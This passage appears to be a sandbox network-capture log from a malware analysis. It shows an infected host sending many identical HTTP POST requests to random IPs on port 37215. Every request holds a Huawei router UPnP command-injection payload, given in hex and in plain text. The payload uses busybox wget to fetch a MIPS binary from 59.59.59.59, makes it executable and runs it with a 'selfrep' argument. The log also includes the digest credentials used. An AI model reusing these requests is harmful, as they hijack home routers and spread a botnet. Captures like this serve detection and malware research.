2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1736192.168.2.1544120197.67.248.9937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:12.910449982 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1737192.168.2.153597835.230.239.24637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:12.910478115 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1738192.168.2.1545092106.221.153.6337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:12.910501957 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1739192.168.2.1551862197.97.219.10037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:12.910533905 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1740192.168.2.155282441.2.91.24937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:12.910566092 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1741192.168.2.156072441.251.172.13937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:12.910590887 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1742192.168.2.154089041.54.38.23537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:12.910799980 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1743192.168.2.1558198197.188.172.20337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:12.910811901 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1744192.168.2.1554428157.225.217.14337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:12.915900946 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1745192.168.2.155885241.233.94.4037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:12.915966034 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1746192.168.2.1548512223.232.170.3137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:12.915992975 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
